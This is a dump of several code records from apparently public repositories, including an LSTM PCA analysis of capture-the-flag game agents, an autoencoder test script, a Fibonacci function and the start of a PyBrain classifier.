str(sorted_randoms))\n","repo_name":"esologic/cs2223","sub_path":"Homework 1/python/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41182189759","text":"from os.path import join\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import zscore\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom itertools import combinations\nfrom statistical_tests import bootstrap_test, fisher_mean\nfrom statsmodels.stats.multitest import multipletests\n\n# Load helper function(s) for interacting with CTF dataset\nfrom ctf_dataset.load import create_wrapped_dataset\n\nbase_dir = '/mnt/bucket/labs/hasson/snastase/social-ctf'\ndata_dir = join(base_dir, 'data')\n\n# Create wrapped CTF dataset\nwrap_f = create_wrapped_dataset(data_dir, output_dataset_name=\"virtual.hdf5\")\n\nn_lstms = 512\nn_repeats = 8\nn_players = 4\nmap_id = 0\n\n# Get matchups with all same agents (e.g. AA vs AA)\nagent_ids = wrap_f['map/matchup/repeat/player/agent_id'][0, :, :, :, 0]\nmatchup_ids = np.all(agent_ids[:, 0, :] == \n agent_ids[:, 0, 0][:, np.newaxis], axis=1)\nn_matchups = np.sum(matchup_ids) # 0, 34, 49, 54\n\n\n# Extract LSTMs for one map and matchup\nlstm = 'lstm'\n\nlstms_matched = wrap_f[f'map/matchup/repeat/player/time/{lstm}'][\n map_id, matchup_ids, ...].astype(np.float32)\nprint(\"Loaded LSTMs for within-population matchups\")\n\n# Apply tanh to LSTMs\nif lstm == 'lstm':\n lstms_matched = np.tanh(lstms_matched)\n\n\n# Matchup-, repeat-, player-specific PCA\nk = n_lstms\n\nlstm_within_pca = {}\nfor m in np.arange(n_matchups):\n lstm_within_pca[m] = {}\n for r in np.arange(n_repeats):\n lstm_within_pca[m][r] = {}\n for p in np.arange(n_players):\n lstm_within_pca[m][r][p] = {}\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(\n zscore(lstms_matched[m, r, p], axis=0))\n lstm_within_pca[m][r][p]['transformed'] = transformed\n lstm_within_pca[m][r][p]['pca'] = pca\n print(f\"Finished running PCA for matchup {m}, \"\n f\"repeat {r}, player {p}\")\n\nnp.save('results/within-pca_tanh-z_results.npy', lstm_within_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_within_pca_long = {'population': [], 'repeat': [], 'player': [],\n 'variance explained': [], 'dimension': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\n\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n for k, v in enumerate(lstm_within_pca[m][r][p][\n 'pca'].explained_variance_ratio_):\n lstm_within_pca_long['population'].append(pops[m])\n lstm_within_pca_long['repeat'].append(r)\n lstm_within_pca_long['player'].append(p)\n lstm_within_pca_long['variance explained'].append(v)\n lstm_within_pca_long['dimension'].append(k + 1)\n\nlstm_within_pca_long = pd.DataFrame(lstm_within_pca_long)\n\nmax_k = 30\nlstm_within_pca_trunc = lstm_within_pca_long[\n lstm_within_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.relplot(data=lstm_within_pca_trunc, x='dimension',\n y='variance explained', hue='repeat',\n col='population', col_wrap=2,\n kind='line')\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, n_repeats, n_players, len(percents)))\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n for i, perc in enumerate(percents):\n k = 
np.sum(np.cumsum(\n lstm_within_pca[m][r][p][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, r, p, i] = k\n\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, ..., i]))\n min = int(np.amin(percents_vaf[m, ..., i]))\n max = int(np.amax(percents_vaf[m, ..., i]))\n print(f\"Population {pops[m]}: {median} dimensions \"\n f\"for {perc} variance (range: {min}-{max})\")\n print('\\n')\n\n\n# Horizontally stack pairs of players and compute joint PCA\npairs = list(combinations(np.arange(n_players), 2))\nn_pairs = len(pairs)\n\nk = n_lstms * 2\n\ncoop_ids, comp_ids = [0, 5], [1, 2, 3, 4]\n\nlstm_pair_pca = {}\nfor m in np.arange(n_matchups):\n lstm_pair_pca[m] = {}\n for r in np.arange(n_repeats):\n lstm_pair_pca[m][r] = {}\n for p, pair in enumerate(pairs):\n lstm_pair_pca[m][r][p] = {}\n stack_lstm = np.hstack((lstms_matched[m, r, pair[0]],\n lstms_matched[m, r, pair[1]]))\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(\n zscore(stack_lstm, axis=0))\n lstm_pair_pca[m][r][p]['transformed'] = transformed\n lstm_pair_pca[m][r][p]['pca'] = pca\n print(f\"Finished running PCA for matchup {m}, \"\n f\"repeat {r}, pair {pair}\")\n \nnp.save('results/pair-pca_lstm_tanh-z_results.npy', lstm_pair_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_pair_pca_long = {'population': [], 'repeat': [], 'pair': [],\n 'variance explained': [], 'dimension': [],\n 'type': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\npair_type = {c:('cooperative' if c in coop_ids else 'competitive')\n for c in np.arange(n_pairs)}\n\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_pairs):\n for k, v in enumerate(lstm_pair_pca[m][r][p][\n 'pca'].explained_variance_ratio_):\n lstm_pair_pca_long['population'].append(pops[m])\n lstm_pair_pca_long['repeat'].append(r)\n lstm_pair_pca_long['pair'].append(p)\n lstm_pair_pca_long['variance explained'].append(v)\n lstm_pair_pca_long['dimension'].append(k + 1)\n lstm_pair_pca_long['type'].append(pair_type[p])\n\nlstm_pair_pca_long = pd.DataFrame(lstm_pair_pca_long)\n\nmax_k = 10\nlstm_pair_pca_trunc = lstm_pair_pca_long[\n lstm_pair_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.relplot(data=lstm_pair_pca_trunc, x='dimension',\n y='variance explained', hue='type',\n col='population', col_wrap=2, linewidth=3,\n kind='line')\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, n_repeats, n_pairs, len(percents)))\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_pairs):\n for i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_pair_pca[m][r][p][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, r, p, i] = k\n\nfor m in np.arange(n_matchups):\n for type, c in zip(['cooperative', 'competitive'],\n [coop_ids, comp_ids]):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, :, c, i]))\n min = int(np.amin(percents_vaf[m, :, c, i]))\n max = int(np.amax(percents_vaf[m, :, c, i]))\n print(f\"Population {pops[m]} {type}: {median} dimensions \"\n f\"for {perc} variance (range: {min}-{max})\")\n print('\\n')\n\n\n# Stack across all repeats and run PCA\nk = n_lstms\n\nlstm_stack_pca = {}\nfor m in np.arange(n_matchups):\n lstm_stack_pca[m] = {}\n \n stack_lstm = []\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n 
stack_lstm.append(zscore(lstms_matched[m, r, p],\n axis=0))\n \n stack_lstm = np.vstack(stack_lstm)\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(stack_lstm)\n\n lstm_stack_pca[m]['transformed'] = transformed\n lstm_stack_pca[m]['pca'] = pca\n print(f\"Finished running stacked PCA for matchup {m}\")\n \nnp.save('results/stack-pca_lstm_tanh-z_results.npy', lstm_stack_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_stack_pca_long = {'population': [], 'variance explained': [],\n 'dimension': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\n\nfor m in np.arange(n_matchups):\n for k, v in enumerate(lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_):\n lstm_stack_pca_long['population'].append(pops[m])\n lstm_stack_pca_long['variance explained'].append(v)\n lstm_stack_pca_long['dimension'].append(k + 1)\n\nlstm_stack_pca_long = pd.DataFrame(lstm_stack_pca_long)\n\nmax_k = 8\nlstm_stack_pca_trunc = lstm_stack_pca_long[\n lstm_stack_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.lineplot(data=lstm_stack_pca_trunc, x='dimension',\n y='variance explained', hue='population',\n linewidth=3)\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, len(percents)))\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, i] = k\n\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, i]))\n print(f\"Population {pops[m]}: {median} dimensions \"\n f\"for {perc} variance\")\n print('\\n')\n\n\n# Plot scree plot of variance accounted\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nmatchup = 0\npca_k = 100\nevr = lstm_stack_pca[matchup]['pca'].explained_variance_ratio_\nevr_cum = np.cumsum(evr)\ndimensions = np.arange(1, 513)\n\npercents = [.9, .95, .99]\npercents_vaf = {}\nfor i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[k] = perc\n\nfig, ax = plt.subplots(figsize=(5.5, 4.5))\nax.scatter(dimensions, evr, color='.5')\nax.scatter(dimensions[:pca_k], evr[:pca_k], color='tab:red')\nax.set_xlabel('dimensions')\nax.set_ylabel('proportion of\\nvariance explained')\nfor k, perc in percents_vaf.items():\n ax.axvline(k, 0, .35, color='.5', zorder=-1)\n ax.annotate(f'{perc:.0%}', xy=(k + 10, .37), ha='center',\n xycoords=('data', 'axes fraction'))\naxins = inset_axes(ax, width=1.2, height=1)\naxins.scatter(dimensions, evr_cum, color='.5')\naxins.scatter(dimensions[:pca_k], evr_cum[:pca_k], color='tab:red')\naxins.xaxis.set_ticks([])\naxins.yaxis.set_ticks([])\naxins.set_xlabel('dimensions', size=12)\naxins.set_ylabel('cumulative\\nvariance', size=12)\nplt.savefig(f'figures/scree_tanh-z_pca-k{pca_k}_m{matchup}.png', dpi=300,\n bbox_inches='tight')\n \n \n# Create reduced-dimension version of data (e.g. 
k = 100)\nk = 100\n\nlstm_pca_reduce = []\nfor m in np.arange(n_matchups):\n \n stack_lstm = []\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n stack_lstm.append(zscore(lstms_matched[m, r, p],\n axis=0))\n \n stack_lstm = np.vstack(stack_lstm)\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(stack_lstm)\n \n percent_vaf = np.sum(pca.explained_variance_ratio_)\n \n # Un-stack PCA-transformed arrays for repeats, players\n unstack_lstm = np.stack(np.split(np.stack(\n np.split(transformed, 8), axis=0), 4, axis=1), axis=1)\n \n lstm_pca_reduce.append(unstack_lstm)\n print(f\"Finished running stacked PCA for matchup {m}\")\n print(f\"Proportion variance at for matchup {m} at k = {k}: \"\n f\"{percent_vaf:.3f}\")\n \nlstm_pca_reduce = np.stack(lstm_pca_reduce, axis=0)\n\nnp.save(f'results/lstms_tanh-z_pca-k{k}.npy', lstm_pca_reduce)\n\n\n# Plot some example PC time series\nk = 100\nlstms_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\n\n\n### Get rid of everything south of heres\n\n# Compute correlations for PC in comparison to game variable \nfrom features import get_features\nfrom scipy.stats import pearsonr\n\n# Load pre-saved PCA's \nk = 100\nlstm_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\n\n\n# Exclude degenerate features from analysis \nfeature_set = ['position', 'health', 'events']\nall_features, labels = get_features(wrap_f, feature_set=feature_set,\n map_id=map_id, matchup_id=matchup_ids,\n player_id=slice(None),\n repeat_id=slice(None))\n\nfeatures_exclude = []\nfor label in labels: \n features = all_features[..., np.array(labels) == label]\n n_nonzeros = np.sum(np.nonzero(features))\n print(f'checking {label} for all nonzeros; \"found {n_nonzeros} nonzeros')\n if n_nonzeros == 0:\n features_exclude.append(label)\n print(f'excluding {label}')\n \nlabels = [l for l in labels if l not in features_exclude] \n \n# Define a single variable to pull stats from\n# (this may be redundant, review later)\npca_corrs = {}\nfor game_var in labels:\n features = all_features[..., np.array(labels) == game_var]\n # code is breaking above because new labels code that\n # removes degenerative features does not match dimensions of \n feature_shape = features.shape[:-2]\n pca_corrs[game_var] = np.full(feature_shape + (k,), np.nan)\n \n for matchup_id in np.arange(n_matchups):\n for repeat_id in np.arange(n_repeats): \n for player_id in np.arange(n_players): \n for pc_id in np.arange(k):\n pc_corr = pearsonr(features[matchup_id, repeat_id, player_id, :, 0],\n lstm_pca[matchup_id, repeat_id, player_id,\n :, pc_id])[0]\n pca_corrs[game_var][matchup_id, repeat_id, player_id, pc_id] = pc_corr\n \n\n print(f\"finished pca correlations w/ {game_var}\")\n\n# Save dictionary \nnp.save(f'results/lstm_pca-k{k}_feature_correlations.npy', pca_corrs)\n\n\n# Summarize PCA correlations across players and repeats\npca_corrs = np.load('results/lstm_pca-k100_feature_correlations.npy',\n allow_pickle=True)\npca_corr_means = []\n\nfor game_var in pca_corrs:\n pca_corr_means.append(np.nanmean(pca_corrs[game_var], axis=(1, 2)))\n\npca_corr_means = np.stack(pca_corr_means, 1)\n\nassert pca_corr_means.shape[1] == len(labels)\n\npc_id = 2\nfor pc_id in np.arange(1,10):\n plt.matshow(pca_corr_means[..., pc_id], cmap='RdBu_r')\n plt.yticks([0, 1, 2, 3], ['A','B','C','D'])\n plt.xticks(np.arange(pca_corr_means.shape[1]), labels, rotation=90);\n plt.title(f'PCA Feature Correlations for PC{pc_id}')\n plt.colorbar()\n\n\n# Look at some properties of the PCA-reduced LSTMs\nk = 
100\n#lstm_pca_reduce = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\nlstm_pca_reduce = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-pre.npy')\n\n# Look at ISC of PCs for individual games\nmatchup, repeat = 0, 0\n\nn_pcs = 10\nfig, axs = plt.subplots(2, 5, figsize=(25, 8))\nfor pc, ax in zip(np.arange(n_pcs), axs.ravel()):\n corr = np.corrcoef(lstm_pca_reduce[matchup, repeat, ..., pc])\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n\n\n# Look at ISC of PCs averaged across games\npca_k = 100\nmatchup = 0\nn_repeats = 8\n\nn_pcs = 10\nfig, axs = plt.subplots(2, 5, figsize=(25, 8))\nfor pc, ax in zip(np.arange(n_pcs), axs.ravel()):\n corr = fisher_mean([np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)], axis=0)\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n#plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{pca_k}_m{matchup}.png',\n# dpi=300, bbox_inches='tight')\nplt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{pca_k}_reg-pre_m{matchup}.png',\n dpi=300, bbox_inches='tight')\n \n\n# Specific subset of PCs averaged across games\nmatchup = 0\nn_repeats = 8\n\npcs = [2, 5, 9]\nfig, axs = plt.subplots(1, len(pcs), figsize=(12, 2.8))\nfor pc, ax in zip(pcs, axs.ravel()):\n corr = np.mean([np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)], axis=0)\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n\n \n# Difference in cooperative/competitive ISC across PCs\nmatchup = 0\nn_repeats = 8\nn_pcs = 100\n\nisc_diffs = []\nisc_diffs_df = {'difference': [], 'PC': [], 'repeat': []}\nfor pc in np.arange(n_pcs):\n corrs = [np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)]\n diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])\n for c in corrs]\n isc_pc_diffs = []\n for r, diff in enumerate(diffs):\n isc_diffs_df['difference'].append(diff)\n isc_diffs_df['PC'].append(pc + 1)\n isc_diffs_df['repeat'].append(r)\n isc_pc_diffs.append(diff)\n isc_diffs.append(isc_pc_diffs)\nisc_diffs_df = pd.DataFrame(isc_diffs_df)\nisc_diffs = np.array(isc_diffs).T\n\nobserved, ci, p, distribution = bootstrap_test(isc_diffs,\n bootstrap_axis=0,\n n_bootstraps=1000,\n estimator=fisher_mean,\n ci_percentile=95,\n side='two-sided')\n\n_, fdr_p, _, _ = multipletests(p, method='fdr_bh')\n\nsig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]\nsig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]\n\nfig, ax = plt.subplots(figsize=(16, 4))\nsns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',\n estimator=fisher_mean)\n# ax.set_ylim(-.375, .325) # for matchup = 3 (sig y = -.01)\nax.set_ylim(-.3, 1) # for matchup = 0\nax.set_xticks([0, 19, 39, 59, 79, 99])\nfor sig_pc in sig_pos:\n ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,\n xycoords=('data', 'axes fraction'),\n ha='center', va='bottom')\nfor sig_pc in sig_neg:\n ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,\n xycoords=('data', 'axes fraction'),\n ha='center', va='bottom')\nax.set_ylabel('cooperative – competitive ISC')\nax.set_title(f'difference in cooperative vs. 
competitive ISC for 100 PCs');\nplt.savefig(f'figures/isc_diff-bars_tanh-z_pca-k{pca_k}_m{matchup}.png',\n dpi=300, bbox_inches='tight')\n\n\n\n# Examine time-resolved intersubject synchrony of PCs\nfrom brainiak.isc import isc\nfrom detectors import get_following\n\nmatchup = 0\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\nrepeat = 1\npc = 10 - 1 \n\nfollowing = get_following(wrap_f, matchup_id=matchup, repeat_id=repeat)\n\nlstm_pc = lstm_pca_reduce[matchup, repeat, ..., pc]\nlstm_pc_isc = isc(lstm_pc.T, pairwise=True)[:, 0]\n\nfig, axs = plt.subplots(10, 1, figsize=(12, 14))\naxs[0].plot(lstm_pc[0], c='darkred', alpha=.7)\naxs[0].plot(lstm_pc[1], c='coral', alpha=.7)\naxs[0].set_xticks([])\naxs[0].set_ylabel('activation')\naxs[0].set_title(f'PC{pc + 1} (population {pops[matchup]}, '\n f'repeat {repeat})')\naxs[0].annotate(f'ISC: {lstm_pc_isc[0]:.3f}', (.95, .95),\n ha='right', xycoords='axes fraction')\naxs[1].plot(lstm_pc[2], c='darkblue', alpha=.7)\naxs[1].plot(lstm_pc[3], c='lightseagreen', alpha=.7)\naxs[1].set_xticks([])\naxs[1].set_ylabel('activation')\naxs[1].annotate(f'ISC: {lstm_pc_isc[5]:.3f}', (.95, .95),\n ha='right', xycoords='axes fraction')\n\nlstm_pc_isps = isps(lstm_pc.T)\naxs[2].plot(lstm_pc_isps[0], c='darkred', alpha=.7)\naxs[2].set_xticks([])\naxs[2].set_ylabel('phase\\nnsynchrony')\naxs[3].plot(lstm_pc_isps[5], c='darkblue', alpha=.7)\naxs[3].set_xticks([])\naxs[3].set_ylabel('phase\\nsynchrony')\n\nlstm_pc_iscf = iscf(lstm_pc.T)\naxs[4].plot(lstm_pc_iscf[0], c='darkred', alpha=.7)\naxs[4].set_xticks([])\naxs[4].set_ylabel('co-fluctuation')\naxs[5].plot(lstm_pc_iscf[5], c='darkblue', alpha=.7)\naxs[5].set_xticks([])\naxs[5].set_ylabel('co-fluctuation')\n\nlstm_pc_win = window_isc(lstm_pc.T)\naxs[6].plot(resample_windows(lstm_pc_win.T[0], width=150,\n collapse=np.nanmean),\n c='darkred', alpha=.7)\naxs[6].set_xticks([])\naxs[6].set_ylabel('window ISC\\n(width=150)')\naxs[7].plot(resample_windows(lstm_pc_win.T[1], width=150,\n collapse=np.nanmean), \n c='darkblue', alpha=.7)\naxs[7].set_ylabel('window ISC\\n(width=150)')\naxs[7].set_xticks([])\n\naxs[8].plot(following[0], c='darkred', alpha=.7)\naxs[8].set_ylabel('following')\naxs[8].set_xticks([])\naxs[9].plot(following[1], c='darkblue', alpha=.7)\naxs[9].set_ylabel('following')\nplt.xlabel('time')\nsns.despine()\n\nplt.savefig(f'PC{pc + 1}_coop_m{matchup}_r{repeat}.png',\n dpi=300, transparent=False,\n bbox_inches='tight')\n\n\n# Correlation matrix of coupling metrics\nmatchup = 0\nn_repeats = 8\npc = 10 - 1\n\ncorrs = []\nfor repeat in np.arange(n_repeats):\n lstm_pc = lstm_pca_reduce[matchup, repeat, ..., pc]\n lstm_pc_isps = isps(lstm_pc.T)\n lstm_pc_iscf = iscf(lstm_pc.T)\n lstm_pc_wins = window_isc(lstm_pc.T)\n following = get_following(wrap_f, repeat_id=repeat, pair_ids=np.arange(6))\n \n pair_corrs = []\n for pair in [0, 5]:\n lstm_pc_win = np.nan_to_num(resample_windows(lstm_pc_wins.T[pair],\n width=150,\n collapse=np.nanmean))\n \n corr = np.corrcoef(np.vstack((lstm_pc_isps[pair],\n lstm_pc_iscf[pair],\n lstm_pc_win,\n following[pair])))\n corrs.append(corr)\n\ncorrs_mean = np.mean(corrs, axis=0)\n\nlabels = ['phase synchrony', 'co-fluctuation', 'windowed ISC', 'following']\nfig, ax = plt.subplots(figsize=(5, 4))\nm = sns.heatmap(corrs_mean, vmin=0, vmax=1, cmap='inferno', annot=True,\n cbar=True, square=True, xticklabels=labels, yticklabels=labels)\nm.tick_params(left=False, bottom=False)\nm.set_title(f'PC{pc + 1} coupling correlation')\nplt.savefig(f'PC{pc + 1}_coop_corrs.png', dpi=300, 
bbox_inches='tight')\n\n\n\n\n","repo_name":"andrewgoldberg01/social-ctf","sub_path":"lstm_pca.py","file_name":"lstm_pca.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"24025897174","text":"# STATIC VARIABLES\ntitle = \"PyCar\"\nversion = \"1.0\"\n\n# SCREEN RESOLUTION\nscreenWidth = 1280\nscreenHeight = 720\n\n# CAR IMAGE RESOLUTION\ncarWidth = 53\ncarHeight = 97\n\n# COLORS\ndarkgreen = (0, 100, 0)\nred = (255, 0, 0)\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n","repo_name":"satyajitGiriASU/2D_SelfDrivingCar_DQN","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20551218712","text":"def fibonacci(n):\n \"\"\"Функция принимает в качестве аргумента индекс (целое число)\n\n Функция возвращает число Фибоначчи с этим индексом. \n \"\"\"\n\n if n == 0: return 0\n\n if n in (1, 2): return 1\n\n if n < 0: return fibonacci(n + 2) - fibonacci(n + 1)\n\n return fibonacci(n - 1) + fibonacci(n - 2)\n \ntry:\n x = int(input('Введите число Фибоначчи : '))\n x = fibonacci(x)\n print('Ваше число Фибоначчи : {}'.format(x))\n\nexcept ValueError:\n print('Необходимо вводить целое число')","repo_name":"KristaliX/Fukin-Ivan","sub_path":"Homework 5/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39490462204","text":"import matplotlib\nmatplotlib.use('Agg')\nimport argparse\nimport os\nimport random\nimport time\n\nimport torch\nfrom torch import nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport torchvision\nimport torchvision.utils as vutils\nfrom torchvision import transforms\nimport torchvision.datasets as dset\nfrom torchvision.utils import save_image\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom models import autoencoder as AE\n\n\n#Set random seed for reproducibility\nmanualSeed = 999\n\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--bg_data', type=str, dest='data_dst', default='data/data_dst')\nparser.add_argument('--target_data', type=str, dest='data_src', default='data/data_src')\nparser.add_argument('--workers', type=int, default=8)\nparser.add_argument('--batch', type=int, dest='batch_size', default=128)\nparser.add_argument('--image_size', type=int, default=128)\nparser.add_argument('--num_channel', type=int, dest='nc', default=3)\nparser.add_argument('--num_z', type=int, dest='nz', default=100)\nparser.add_argument('--ndf', type=int, default=128)\nparser.add_argument('--nef', type=int, default=128)\nparser.add_argument('--epoch',type=int, dest='num_epochs',default=100)\nparser.add_argument('--lr', type=float, default=1e-3)\nparser.add_argument('--beta1', type=float, default=0.5)\nparser.add_argument('--ngpu', type=int, default=1)\nparser.add_argument('--result', type=str, dest='result_path', default='/home/jjck5938/changed_model/results')\nparser.add_argument('--checkpoint', type=str, default='aemom_sim.pth')\nargs = parser.parse_args()\n\n\ndatasetA = dset.ImageFolder(root=args.data_dst,\n 
transform=transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.CenterCrop(args.image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]))\n\ndataloaderA = torch.utils.data.DataLoader(datasetA, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n\ndatasetB = dset.ImageFolder(root=args.data_src,\n transform=transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.CenterCrop(args.image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]))\n\ndataloaderB = torch.utils.data.DataLoader(datasetB, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n\n\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available() and args.ngpu > 0) else \"cpu\")\n\n\n#Plot some training image\nreal_batch = next(iter(dataloaderB))\nplt.figure(figsize=(8,8))\nplt.axis(\"off\")\nplt.title(\"Training Images\")\nplt.imshow(np.transpose(vutils.make_grid(real_batch[0].to(device)[:64], padding=1, normalize=True).cpu(), (1,2,0)))\nplt.savefig(os.path.join(args.result_path, \"real_sample.png\"))\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\ndef to_img(x):\n x = 0.5 * (x +1)\n x = x.clamp(0, 1)\n x = x.view(x.size(0), 1, 28, 28)\n return x\n\n\ncheckpoint = torch.load(args.checkpoint, map_location=\"cuda:0\")\nnetE = AE.encoder_(args).cuda()\nnetDA = AE.decoder_(args).cuda()\nnetDB = AE.decoder_(args).cuda()\nmodelA = AE.autoencoder(args, netE, netDA)\nmodelB = AE.autoencoder(args, netE, netDB)\n\nmodelA.load_state_dict(checkpoint['modelA_state_dict'])\nmodelA.to(device)\n\nmodelB.load_state_dict(checkpoint['modelB_state_dict'])\nmodelB.to(device)\n\nreal_img = real_batch[0].to(device)[:32]\n#real_img = torch.unsqueeze(real_img, 0)\nout_imgA = modelA(real_img)\nout_imgB = modelB(real_img)\nprint(\"saving.....\")\nsave_image(out_imgA, './fake_imgB_from_modelA.png')\nsave_image(out_imgB, './fake_imgB_from_modelB.png')\nsave_image(real_img, './real_img.png')\nprint(\"save predict_img success!\")\n","repo_name":"Mombin/Mom_Net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24221998090","text":"#!/usr/bin/env python\n\n\"\"\"\nUsage:\n neural_network_classification.py nsamples miters hlayers ...\n neural_network_classification.py (-h | --help)\n\nOptions:\n -h --help Show this screen.\n\n\"\"\"\n\nfrom docopt import docopt\n\nfrom sklearn.datasets import make_blobs\n\nfrom pybrain.datasets import ClassificationDataSet\nfrom pybrain.utilities import percentError\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.supervised.trainers import BackpropTrainer\nfrom pybrain.structure.modules import SoftmaxLayer\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\n\narguments = docopt(__doc__)\n\nnum_hidden_layers = map(int, arguments[''])\nmax_iters = int(arguments[''])\n\nX1, y1 = make_blobs(n_samples=int(arguments[''])/2, centers=2,\n cluster_std=0.6)\nX2, y2 = make_blobs(n_samples=int(arguments[''])/2, centers=2,\n cluster_std=0.6)\n\nX = np.concatenate((X1, X2))\ny = np.concatenate((y1, y2))\n\nm, n = X.shape\n\ndataset = ClassificationDataSet(n, 1, nb_classes=2)\nfor i 
